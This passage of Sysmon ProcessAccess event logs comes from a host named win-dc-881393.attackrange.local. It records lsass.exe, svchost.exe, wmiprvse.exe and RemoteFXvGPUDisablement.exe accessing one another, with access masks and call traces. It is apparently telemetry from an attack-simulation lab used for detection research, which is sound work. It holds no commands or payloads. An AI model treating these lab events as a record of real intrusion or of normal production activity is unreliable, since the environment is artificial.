C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001049400100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001049400100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001049400100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
